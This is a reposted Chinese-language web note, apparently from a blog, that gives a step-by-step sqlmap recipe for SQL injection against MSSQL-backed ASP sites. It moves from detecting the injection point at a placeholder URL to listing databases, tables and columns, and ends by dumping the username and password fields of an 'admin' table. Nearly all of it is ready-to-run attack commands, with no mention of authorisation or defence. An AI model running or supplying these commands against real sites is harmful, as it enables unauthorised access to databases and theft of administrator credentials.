SQLMAP渗透笔记之MSSQL数据库注入
来源:互联网 发布:南宁直销软件多少钱 编辑:程序博客网 时间:2024/05/16 00:44
---------------------------------------------------------------------------------------------
SQLMAP渗透笔记之MSSQL数据库注入
---------------------------------------------------------------------------------------------
1.判断注入点,获取网站信息
sqlmap.py -u http://www.xx.com/ss.asp?id=123
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123"
2.获取所有数据库
sqlmap.py -u http://www.xx.com/ss.asp?id=123 --dbs
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --dbs
3.获取网站当前所使用的数据库
sqlmap.py -u http://www.xx.com/ss.asp?id=123 --current-db
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" --current-db
4.获取数据库中的表名
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 --tables
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 --tables
5.获取数据表中的字段名
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 --columns
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin --columns
6.获取字段中的内容
sqlmap.py -u http://www.xx.com/ss.asp?id=123 -D 数据库名 -T 表名 -C "字段名1,字段名2..." --dump
例:
sqlmap.py -u "http://www.xx.com/ss.asp?id=123" -D news2008 -T admin -C "username,psw" --dump
阅读全文
